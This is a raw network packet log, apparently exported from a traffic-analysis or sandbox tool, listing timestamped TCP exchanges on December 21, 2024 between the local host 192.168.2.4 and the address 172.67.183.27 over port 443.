                                                                                                                                            Dec 21, 2024 20:13:54.217250109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.223587990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.223634958 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.223661900 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.223675013 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.223704100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.223720074 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.243818998 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.243887901 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.243894100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.243920088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.243952990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.243973017 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.249578953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.249639988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.249659061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.249669075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.249696970 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.249715090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.256093025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.256134987 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.256164074 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.256177902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.256200075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.256223917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.262279034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.262325048 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.262345076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.262353897 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.262386084 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.262404919 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.398152113 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.398219109 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.398252010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.398279905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.398293972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.398317099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.403789043 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.403846025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.403868914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.403882027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.403903961 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.403920889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.409908056 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.409953117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.409984112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.410000086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.410023928 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.410041094 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.415865898 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.415927887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.415936947 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.415958881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.415983915 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.415998936 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.436428070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.436492920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.436510086 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.436526060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.436562061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.436583996 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.441674948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.441745996 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.441766024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.441782951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.441802025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.441819906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.448081017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.448137045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.448159933 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.448170900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.448191881 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.448213100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.454364061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.454406023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.454432964 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.454443932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.454473019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.454492092 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.592135906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.592206001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.592226028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.592241049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.592263937 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.592276096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.598237991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.598298073 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.598306894 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.598331928 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.598356009 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.598377943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.604551077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.604595900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.604607105 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.604619026 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.604646921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.604659081 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.610903025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.610946894 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.610958099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.610971928 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.611001968 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.611022949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.628514051 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.628576994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.628587961 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.628609896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.628628016 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.628658056 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.634036064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.634104967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.634124994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.634135962 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.634165049 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.634186029 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.640435934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.640479088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.640506983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.640516996 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.640537024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.640548944 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.646852970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.646895885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.646919966 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.646930933 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.646964073 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.646975994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.782654047 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.782716990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.782732010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.782757044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.782779932 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.782795906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.788321018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.788403988 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.788408995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.788439989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.788461924 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.788490057 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.794089079 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.794140100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.794162989 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.794171095 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.794198036 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.794235945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.800595045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.800637960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.800662994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.800668001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.800694942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.800713062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.820828915 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.820898056 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.820904970 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.820930004 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.820955038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.820998907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.826160908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.826217890 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.826236963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.826246023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.826277971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.826293945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.833916903 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.833962917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.833985090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.833997965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.834019899 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.834043980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.839235067 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.839278936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.839307070 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.839318991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.839346886 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.839366913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.974780083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.974843025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.974881887 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.974889994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.974931955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.974931955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.980506897 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.980561972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.980595112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.980602026 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.980621099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.980719090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.987175941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.987231016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.987266064 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.987271070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.987298012 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.987612963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.992981911 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.993026018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.993068933 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.993073940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.993103981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.993181944 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.013082981 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.013151884 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.013183117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.013190031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.013212919 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.013283014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.018867016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.018897057 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.018975019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.018975019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.018981934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.022208929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.024976969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.025032043 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.025069952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.025077105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.025100946 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.027642012 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.031385899 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.031429052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.031466007 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.031471968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.031498909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.031594038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.166953087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.167021990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.167062044 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.167073011 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.167098999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.167331934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.172842026 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.172888994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.172925949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.172931910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.172959089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.173031092 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.179389954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.179436922 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.179472923 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.179480076 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.179506063 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.179574966 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.185254097 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.185312986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.185384035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.185394049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.185419083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.185480118 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.205111980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.205157042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.205243111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.205243111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.205251932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.205383062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.210980892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.211029053 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.211066008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.211071968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.211100101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.211150885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.217430115 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.217487097 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.217525959 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.217531919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.217557907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.217621088 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.223650932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.223695040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.223731995 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.223737955 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.223762989 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.223829031 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.359550953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.359615088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.359653950 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.359659910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.359685898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.359752893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.365433931 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.365478992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.365499973 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.365506887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.365530014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.365578890 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.371030092 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.371074915 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.371109009 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.371114969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.371148109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.371186972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.377643108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.377695084 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.377739906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.377747059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.377914906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.397737980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.397808075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.397857904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.397872925 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.397919893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.397919893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.403434992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.403489113 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.403542042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.403553963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.403582096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.403611898 CET49737443192.168.2.4172.67.183.27
